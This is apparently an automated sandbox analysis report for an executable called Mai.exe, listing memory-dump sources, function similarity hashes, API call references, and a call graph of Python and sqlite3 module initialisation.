                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                            • String ID:
                                                            • API String ID: 2933794660-0
                                                            • Opcode ID: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
                                                            • Instruction ID: abd122a30492487297c398789d2e749bc2c7cafcc187e6ca94af4c4229a10d52
                                                            • Opcode Fuzzy Hash: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
                                                            • Instruction Fuzzy Hash: BD115122F15F4599EB00DFA4E8542BD33A4F719758F040E32DA7D86BA4EF78E5A49380
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                            • String ID: ?
                                                            • API String ID: 1286766494-1684325040
                                                            • Opcode ID: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
                                                            • Instruction ID: 8991e7e9b23fd172d6de057242bfd5e9f814f69f8234eead233f31bdf448ded3
                                                            • Opcode Fuzzy Hash: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
                                                            • Instruction Fuzzy Hash: 6A41F522E182C676F760AB65D44137E5650EB80BA4F144237EF5C86ED5FE3CD461D780
                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD6695D6
                                                              • Part of subcall function 00007FF6DD66AF0C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF22
                                                              • Part of subcall function 00007FF6DD66AF0C: GetLastError.KERNEL32(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF2C
                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6DD65BFE5), ref: 00007FF6DD6695F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                            • String ID: C:\Users\user\Desktop\Mai.exe
                                                            • API String ID: 2553983749-3878141378
                                                            • Opcode ID: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
                                                            • Instruction ID: 617c91fb83c9bd972549e5187c92c442b5bd0465659402e24ff567c4b640f87a
                                                            • Opcode Fuzzy Hash: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
                                                            • Instruction Fuzzy Hash: 9A417C36E48B9286EB54EF2598510BC2794EB84790F544077EE4EC3B89EF3CE4A193C0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite
                                                            • String ID: U
                                                            • API String ID: 442123175-4171548499
                                                            • Opcode ID: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
                                                            • Instruction ID: b674495861ca36f45ba876f05a8dc9996685acf6277f6d79d6128ee86a3b1d0e
                                                            • Opcode Fuzzy Hash: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
                                                            • Instruction Fuzzy Hash: BB41B122E18AC592EB20EF65E4443AD6764FB98B94F404032EE4DC7798EF3CE455DB80
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID: :
                                                            • API String ID: 1611563598-336475711
                                                            • Opcode ID: 9ff0cd5ba2d057391727bad9116619ea0dc18b87a05b7d3f5e4e2c30a93bc506
                                                            • Instruction ID: 49fa683fce1cbc9d6b0ba07a15d9cd228be5cc9815fb9d03097c98c810349aba
                                                            • Opcode Fuzzy Hash: 9ff0cd5ba2d057391727bad9116619ea0dc18b87a05b7d3f5e4e2c30a93bc506
                                                            • Instruction Fuzzy Hash: 79212632E086C182EB20AB25D00527D73B1FB94B88F414137DA8D83289EF7CE959D7C1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Message$ByteCharMultiWide
                                                            • String ID: Fatal error detected
                                                            • API String ID: 1878133881-4025702859
                                                            • Opcode ID: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
                                                            • Instruction ID: 292531adec5b8a74a06883c8e8e0f74f451c8398d62c1fc1951d06819177978e
                                                            • Opcode Fuzzy Hash: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
                                                            • Instruction Fuzzy Hash: 2521B772A286C691E720EB14F4506EE6354FF84784F805137E68D87A66EF3CD265DB40
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Message$ByteCharMultiWide
                                                            • String ID: Error detected
                                                            • API String ID: 1878133881-3513342764
                                                            • Opcode ID: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
                                                            • Instruction ID: 1ec57a0ad0dc5eea6f0df56d2f99b1bec9ed4f6f40ef7c1990fc6390cd9e6e34
                                                            • Opcode Fuzzy Hash: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
                                                            • Instruction Fuzzy Hash: 6921B772A286C691E720EB14F4506FE6354FF84788F805137E68D87A65EF3CD265DB80
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFileHeaderRaise
                                                            • String ID: csm
                                                            • API String ID: 2573137834-1018135373
                                                            • Opcode ID: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
                                                            • Instruction ID: ea423dfe3818541cda3d818b7057aa4b85fa25b19e0572fcf1274f2be3b0ae25
                                                            • Opcode Fuzzy Hash: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
                                                            • Instruction Fuzzy Hash: F9115E32A18B8592EB609B29F44026D77E0FB88B84F584235DF8C47B59EF3CD9658740
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                            • String ID: :
                                                            • API String ID: 2595371189-336475711
                                                            • Opcode ID: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
                                                            • Instruction ID: 707f70c71b0563449cb63fbf616276794da8e00826c71e16886524536f9cefce
                                                            • Opcode Fuzzy Hash: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
                                                            • Instruction Fuzzy Hash: 0B018421E1828696FB20BF60D46127E23B0EF44745F400037D54DC6A95FF2CE564EAA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ]'K$0]'K$@]'K$P]'K$`]'K$p]'K
                                                            • API String ID: 0-4092897891
                                                            • Opcode ID: 6c23dd3f7b057529a0359ed3afc768d49dd30a3a09e293ce01333b7eb8082c88
                                                            • Instruction ID: 684d53fcda6ab4a264064d3c90795ad449de6e831e18f9393b204661622a373f
                                                            • Opcode Fuzzy Hash: 6c23dd3f7b057529a0359ed3afc768d49dd30a3a09e293ce01333b7eb8082c88
                                                            • Instruction Fuzzy Hash: 9A21BAC360FAC30FE3559AFC6C095359FD1EBD1290B5981FBE184860EB94A49E0943E6

                                                            Execution Graph

                                                            Execution Coverage:0.1%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:365
                                                            Total number of Limit Nodes:14
93616->93618 93616->93681 93617->93616 93619 7ffba4861681 93618->93619 93620 7ffba486165d PyObject_SetAttr 93618->93620 93705 7ffba4851320 _Py_Dealloc 93619->93705 93621 7ffba486167d 93620->93621 93622 7ffba4861674 _Py_Dealloc 93620->93622 93621->93619 93623 7ffba48616ad 93621->93623 93622->93621 93625 7ffba48616dd PyObject_SetItem 93623->93625 93626 7ffba48616d5 PyDict_SetItem 93623->93626 93628 7ffba48616e3 93625->93628 93626->93628 93627 7ffba48616a2 93627->93456 93629 7ffba48616eb _Py_Dealloc 93628->93629 93630 7ffba48616f4 93628->93630 93629->93630 93631 7ffba48616fc PyTuple_Pack 93630->93631 93630->93681 93632 7ffba4861721 93631->93632 93631->93681 93633 7ffba4861740 _Py_Dealloc 93632->93633 93634 7ffba4861749 93632->93634 93633->93634 93635 7ffba486174e PyTuple_Pack 93634->93635 93634->93681 93636 7ffba486180f PyObject_SetAttr 93635->93636 93637 7ffba4861833 93635->93637 93638 7ffba486182f 93636->93638 93639 7ffba4861826 _Py_Dealloc 93636->93639 93706 7ffba4851320 _Py_Dealloc 93637->93706 93638->93637 93640 7ffba486185f 93638->93640 93639->93638 93642 7ffba486188f PyObject_SetItem 93640->93642 93643 7ffba4861887 PyDict_SetItem 93640->93643 93645 7ffba4861895 93642->93645 93643->93645 93644 7ffba4861854 93644->93456 93646 7ffba486189d _Py_Dealloc 93645->93646 93647 7ffba48618a6 93645->93647 93646->93647 93648 7ffba48618ef PyObject_Vectorcall 93647->93648 93649 7ffba4861967 93647->93649 93647->93681 93650 7ffba4861922 _Py_Dealloc 93648->93650 93651 7ffba486192b 93648->93651 93707 7ffba4851320 _Py_Dealloc 93649->93707 93650->93651 93651->93649 93652 7ffba4861930 PyObject_Vectorcall 93651->93652 93654 7ffba4861962 93652->93654 93655 7ffba4861959 _Py_Dealloc 93652->93655 93654->93649 93657 7ffba4861993 93654->93657 93655->93654 93656 7ffba4861988 93656->93456 93658 7ffba48619a2 93657->93658 93659 7ffba4861999 _Py_Dealloc 93657->93659 93660 7ffba48619c0 PyDict_SetItem 93658->93660 93661 7ffba48619c8 PyObject_SetItem 93658->93661 93659->93658 93662 7ffba48619ce 
93660->93662 93661->93662 93663 7ffba48619d6 _Py_Dealloc 93662->93663 93664 7ffba48619df 93662->93664 93663->93664 93665 7ffba4861a21 PyObject_Vectorcall 93664->93665 93666 7ffba4861a99 93664->93666 93664->93681 93667 7ffba4861a5d 93665->93667 93668 7ffba4861a54 _Py_Dealloc 93665->93668 93708 7ffba4851320 _Py_Dealloc 93666->93708 93667->93666 93669 7ffba4861a62 PyObject_Vectorcall 93667->93669 93668->93667 93670 7ffba4861a8b _Py_Dealloc 93669->93670 93671 7ffba4861a94 93669->93671 93670->93671 93671->93666 93673 7ffba4861ac5 93671->93673 93675 7ffba4861acb _Py_Dealloc 93673->93675 93676 7ffba4861ad4 93673->93676 93674 7ffba4861aba 93674->93456 93675->93676 93677 7ffba4861af2 PyDict_SetItem 93676->93677 93678 7ffba4861afa PyObject_SetItem 93676->93678 93679 7ffba4861b00 93677->93679 93678->93679 93680 7ffba4861b08 _Py_Dealloc 93679->93680 93679->93681 93680->93681 93681->93456 93683 7ffba4854792 93682->93683 93684 7ffba4854633 93682->93684 93683->93481 93683->93482 93683->93681 93684->93683 93685 7ffba4854660 PyObject_GetAttr 93684->93685 93687 7ffba48546e0 PyObject_SetItem 93684->93687 93688 7ffba48546d8 PyDict_SetItem 93684->93688 93690 7ffba4854721 PyErr_Clear PyModule_GetFilenameObject PyUnicode_FromFormat PyErr_SetImportError 93684->93690 93694 7ffba48546ee _Py_Dealloc 93684->93694 93696 7ffba4854783 93684->93696 93685->93684 93686 7ffba485467b PyUnicode_FromFormat 93685->93686 93689 7ffba485469f PyObject_GetItem 93686->93689 93686->93690 93687->93684 93688->93684 93689->93684 93693 7ffba48546b4 _Py_Dealloc 93689->93693 93691 7ffba485476b _Py_Dealloc 93690->93691 93692 7ffba4854774 93690->93692 93691->93692 93695 7ffba485477a _Py_Dealloc 93692->93695 93692->93696 93693->93684 93694->93684 93695->93696 93696->93683 93697 7ffba4854789 _Py_Dealloc 93696->93697 93697->93683 93698->93508 93699->93525 93700->93542 93701->93560 93702->93576 93703->93593 93704->93611 93705->93627 93706->93644 93707->93656 93708->93674 93709 7ffba4568fa0 93718 7ffba4568c80 93709->93718 
93712 7ffba4568fcb _PyObject_New 93713 7ffba4568fe0 FreeLibrary 93712->93713 93714 7ffba4568feb _strdup 93712->93714 93715 7ffba4569005 93713->93715 93714->93715 93716 7ffba456901b 93715->93716 93717 7ffba4569015 _Py_Dealloc 93715->93717 93717->93716 93719 7ffba4568cd2 93718->93719 93720 7ffba4568f2b _PyArg_ParseTuple_SizeT 93718->93720 93719->93720 93722 7ffba4568ce3 93719->93722 93721 7ffba4568f44 93720->93721 93725 7ffba4568f26 93720->93725 93723 7ffba4568f52 PyErr_SetString 93721->93723 93724 7ffba4568e8f _PyArg_ParseTuple_SizeT 93722->93724 93733 7ffba4568d37 _PyArg_ParseTuple_SizeT 93722->93733 93723->93725 93724->93725 93727 7ffba4568eaf 93724->93727 93750 7ffba457add0 8 API calls 2 library calls 93725->93750 93728 7ffba4568ee1 93727->93728 93729 7ffba4568ec1 PyErr_Format 93727->93729 93731 7ffba4568eea PyErr_Format 93728->93731 93732 7ffba4568f03 PyUnicode_FromFormat PyUnicode_AsUTF8 93728->93732 93729->93725 93730 7ffba4568f77 93730->93712 93730->93715 93731->93725 93732->93725 93734 7ffba4568dd0 PyErr_Clear _PyArg_ParseTuple_SizeT 93733->93734 93735 7ffba4568d53 PyUnicode_AsUTF8 93733->93735 93734->93725 93736 7ffba4568e05 PyUnicode_AsUTF8 93734->93736 93735->93725 93737 7ffba4568d68 PyUnicode_GetLength 93735->93737 93738 7ffba4568e1a PyMem_Free 93736->93738 93739 7ffba4568e25 93736->93739 93740 7ffba4568d87 93737->93740 93738->93725 93739->93723 93741 7ffba4568e2e LoadLibraryA PyMem_Free 93739->93741 93742 7ffba4568d9d PyUnicode_AsWideChar 93740->93742 93743 7ffba4568e41 93741->93743 93742->93725 93744 7ffba4568dbe LoadLibraryW 93742->93744 93743->93725 93745 7ffba4568e4a GetLastError 93743->93745 93744->93743 93746 7ffba4568e6d PyErr_Format 93745->93746 93747 7ffba4568e54 93745->93747 93746->93725 93749 7ffba45611a0 __stdio_common_vsprintf fprintf 93747->93749 93749->93746 93750->93730 93751 7ffba4568850 93752 7ffba4568862 93751->93752 93753 7ffba456886e free PyObject_Free 93751->93753 93752->93753 93754 7ffba4568868 FreeLibrary 93752->93754 
93754->93753 93755 7ffba4718268 sqlite3_libversion_number 93756 7ffba471d416 93755->93756 93757 7ffba4718286 sqlite3_initialize 93755->93757 93758 7ffba471d42a PyErr_SetString 93756->93758 93759 7ffba471d41f sqlite3_errstr 93757->93759 93760 7ffba4718294 93757->93760 93771 7ffba47186df 93758->93771 93759->93758 93822 7ffba4718744 PyType_FromModuleAndSpec PyModule_GetState 93760->93822 93762 7ffba471829c 93763 7ffba4718736 sqlite3_shutdown 93762->93763 93823 7ffba471878c PyType_FromModuleAndSpec PyModule_GetState 93762->93823 93763->93771 93764 7ffba471d447 PyErr_Format 93764->93763 93766 7ffba47186ec PyModule_AddIntConstant 93766->93763 93766->93771 93767 7ffba47182ac 93767->93763 93824 7ffba47187d4 PyType_FromModuleAndSpec PyModule_GetState 93767->93824 93770 7ffba47182bc 93770->93763 93825 7ffba4718818 PyType_FromModuleAndSpec PyModule_GetState 93770->93825 93771->93763 93771->93764 93771->93766 93778 7ffba4718724 93771->93778 93830 7ffba47188ec PyModule_GetState PyDict_New PyModule_AddObjectRef 93771->93830 93831 7ffba4718934 PyModule_GetState PyDict_New PyModule_AddObjectRef 93771->93831 93832 7ffba47189f0 PyImport_ImportModule PyModule_GetState PyObject_GetAttrString _Py_Dealloc 93771->93832 93774 7ffba47182cc 93774->93763 93826 7ffba4718860 PyType_FromModuleAndSpec PyModule_GetState 93774->93826 93777 7ffba47182dc 93777->93763 93827 7ffba47188a8 PyType_FromModuleAndSpec PyModule_GetState 93777->93827 93780 7ffba47182ec 93780->93763 93781 7ffba47182f4 PyModule_GetState PyModule_AddType 93780->93781 93781->93763 93782 7ffba4718315 PyModule_AddType 93781->93782 93782->93763 93783 7ffba471832a PyModule_AddType 93782->93783 93783->93763 93784 7ffba4718342 PyModule_AddType 93783->93784 93784->93763 93785 7ffba471835a PyModule_AddType 93784->93785 93785->93763 93786 7ffba4718372 PyErr_NewException 93785->93786 93786->93763 93787 7ffba4718399 PyModule_AddType 93786->93787 93787->93763 93788 7ffba47183ad PyErr_NewException 93787->93788 93788->93763 93789 7ffba47183d4 
PyModule_AddType 93788->93789 93789->93763 93790 7ffba47183e8 PyErr_NewException 93789->93790 93790->93763 93791 7ffba4718409 PyModule_AddType 93790->93791 93791->93763 93792 7ffba471841d PyErr_NewException 93791->93792 93792->93763 93793 7ffba471843e PyModule_AddType 93792->93793 93793->93763 93794 7ffba4718452 PyErr_NewException 93793->93794 93794->93763 93795 7ffba4718473 PyModule_AddType 93794->93795 93795->93763 93796 7ffba4718487 PyErr_NewException 93795->93796 93796->93763 93797 7ffba47184a8 PyModule_AddType 93796->93797 93797->93763 93798 7ffba47184bc PyErr_NewException 93797->93798 93798->93763 93799 7ffba47184dd PyModule_AddType 93798->93799 93799->93763 93800 7ffba47184f1 PyErr_NewException 93799->93800 93800->93763 93801 7ffba4718512 PyModule_AddType 93800->93801 93801->93763 93802 7ffba4718526 PyErr_NewException 93801->93802 93802->93763 93803 7ffba4718546 PyModule_AddType 93802->93803 93803->93763 93804 7ffba471855a PyErr_NewException 93803->93804 93804->93763 93805 7ffba471857b PyModule_AddType 93804->93805 93805->93763 93806 7ffba471858f PyUnicode_InternFromString 93805->93806 93806->93763 93807 7ffba47185a5 PyUnicode_InternFromString 93806->93807 93807->93763 93808 7ffba47185c2 PyUnicode_InternFromString 93807->93808 93808->93763 93809 7ffba47185df PyUnicode_InternFromString 93808->93809 93809->93763 93810 7ffba47185fc PyUnicode_InternFromString 93809->93810 93810->93763 93811 7ffba4718619 PyUnicode_InternFromString 93810->93811 93811->93763 93812 7ffba4718636 PyUnicode_InternFromString 93811->93812 93812->93763 93813 7ffba4718653 PyUnicode_InternFromString 93812->93813 93813->93763 93814 7ffba4718670 93813->93814 93828 7ffba4718980 PyModule_AddIntConstant 93814->93828 93816 7ffba471867f 93816->93763 93829 7ffba4718a5c 49 API calls 93816->93829 93818 7ffba471868f 93818->93763 93819 7ffba4718697 PyModule_AddStringConstant 93818->93819 93819->93763 93820 7ffba47186b6 sqlite3_libversion PyModule_AddStringConstant 93819->93820 93820->93763 93821 
7ffba47186d3 sqlite3_threadsafe 93820->93821 93821->93771 93822->93762 93823->93767 93824->93770 93825->93774 93826->93777 93827->93780 93828->93816 93829->93818 93830->93771 93831->93771 93832->93771 93833 7ffba45b0180 GetSystemInfo 93834 7ffba45b01b4 93833->93834

                                                            Control-flow Graph

                                                            APIs
                                                            • sqlite3_libversion_number.SQLITE3 ref: 00007FFBA4718275
                                                            • sqlite3_initialize.SQLITE3 ref: 00007FFBA4718286
                                                            • PyModule_GetState.PYTHON311 ref: 00007FFBA47182F7
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718307
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA471831C
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718334
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA471834C
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718364
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA4718386
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA471839F
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA47183C1
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA47183DA
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA47183F6
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA471840F
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA471842B
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718444
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA4718460
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718479
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA4718495
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA47184AE
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA47184CA
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA47184E3
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA47184FF
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718518
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA4718534
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA471854C
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA4718568
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718581
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA4718596
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA47185B3
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA47185D0
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA47185ED
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA471860A
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA4718627
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA4718644
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA4718661
                                                              • Part of subcall function 00007FFBA4718980: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471867F), ref: 00007FFBA47189B8
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718A76
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718A94
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718AB0
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718ACC
